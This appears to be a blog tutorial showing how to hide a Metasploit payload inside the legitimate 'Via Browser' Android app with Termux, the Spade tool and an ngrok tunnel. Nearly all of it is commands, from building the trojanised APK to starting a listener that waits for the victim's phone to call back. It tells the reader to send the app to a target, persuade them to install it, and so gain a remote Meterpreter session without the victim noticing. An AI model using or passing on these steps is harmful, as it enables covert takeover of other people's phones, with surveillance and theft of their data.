In This Tutorial, We're Going To Embed Our Payload Inside the Original App With The Help Termux, So That The Victim Won't Notice Anything Suspicious And He'll Never Get To Know That He Has Been Hacked.
So Let's Get Started
Requirements:
- Install Termux
- Install Metasploit In Termux
- Install Ngrok In Termux
Commands For Creating Embedded Payload:
- pkg update
- pkg install git wget curl
- git clone https://github.com/shadowwalker005/Spade
- cd Spade && chmod 775 *
- bash install.sh
Now It Will Take Some Time To Install Its Required Tools, So After This, We Need An Original App Inside Which We Will Embed Our Payload. For This Tutorial, I'll Use "Via Browser" (Recommended)
Download Via Browser And Rename It To browser.apk And Move It From Download Folder To Main Storage
Download Via Browser: Via Browser
Now Run Below Commands:
- cd && cd /sdcard
- cp -r browser.apk ~
- cd && cd Spade
- bash Spade ~/browser.apk
- Select 3
Open Another Terminal And Start Ngrok But Before Starting Ngrok Make Sure To Turn On Hotspot Then It'll Work Otherwise Ngrok Won't Work
- ngrok tcp 8989
- Copy And Paste In Spade (0.tcp.ngrok.io)
- Copy Lport And Paste In Spade (71810)
NOTE: YOURS WILL BE DIFFERENT; DON'T COPY MINE :)
Now It Will Take Some Time Upto 3 Minutes To Process And Embed The Payload
After This, It Will Ask Start Listener, So Type y And Hit Enter.
Now Msfconsole Will Start, But We Need To Change Lhost And Lport
Run Below Commands:
- set LHOST localhost
- set LPORT 8989
- exploit
Now Open Another Terminal And Copy Your Embedded Payload From Termux To Phone Storage And Send To Your Target And Tell Him To Install It
- cd && cd Spade
- cd Gray
- cp -r Payload_Name /sdcard
Now After Victim Will Install Your Payload So You'll Get A Meterpreter Session ✔
That's All
NOTE:
- In Case Of Any Errors Or Issues, Please Feel Free To Contact Me Anytime, I Will Help You :)
Comments
Post a Comment